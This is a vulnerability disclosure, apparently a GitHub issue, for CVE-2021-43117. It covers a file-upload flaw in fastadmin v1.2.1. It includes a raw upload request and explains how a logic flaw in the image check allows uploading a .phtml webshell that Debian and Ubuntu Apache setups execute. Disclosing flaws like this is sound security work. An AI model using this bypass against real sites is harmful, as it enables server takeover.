Headline

CVE-2021-43117: fastadmin v1.2.1 file upload getshell · Issue #1 · ambitiousleader/some-automated-script

fastadmin v1.2.1 is affected by a file upload vulnerability which allows arbitrary code execution through shell access.

2 years ago

#vulnerability #windows #ubuntu #debian #apache #js #git

Detail:

`image.png
POST /fastadmin/public/UCAdNKmOnG.php/ajax/upload HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------261389892721156981001433602982
Content-Length: 23583
Origin: http://localhost
Connection: close
Cookie: Phpstorm-40b5128e=37cc58fa-2924-474e-95a3-1066d7c6bcfd; PHPSESSID=obk19k61dd4jmat3ljhkihr00h; think_var=zh-cn
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------261389892721156981001433602982
Content-Disposition: form-data; name="file"; filename="1.png"
Content-Type: image/png

�PNG
�
`
application/common/library/Upload.php Line 312:

Four method ,analyse one by one
application/common/library/Upload.php#checkSize Line 120: check upload file size is not bigger than default

application/common/library/Upload.php#checkExecutable Line 82: PHP file and HTML file is not allowed to upload

application/common/library/Upload.php#checkMimetype Line 91: check file type,$mimetypeArr is default value,$mimetypeArr =$this->config[‘mimetype’]=[jpg,png,bmp,jpeg,gif,zip,rar,xls,xlsx,wav,mp4,mp3,pdf],file type must in this array

application/common/library/Upload.php#checkImage Line 103:check upload file is a picture,because judgment is logical or,as long as type value in_array return true,we can upload other PHP suffix file that can be parsed，such as php5,phtml,php3 and so on

change the content-type to gif,filename to xx.phtml

however,phtml can’t be parsed,I find that if the CMS is build with Debian or Ubuntu environment,attack can be succeed.Debian or Ubuntu apache2 configuration file write as follow,it will contains mods-enabled/*.conf file automatically，which default parse phtml as php

so,access the shell address to complete the attack,this ip is my debian’s ip address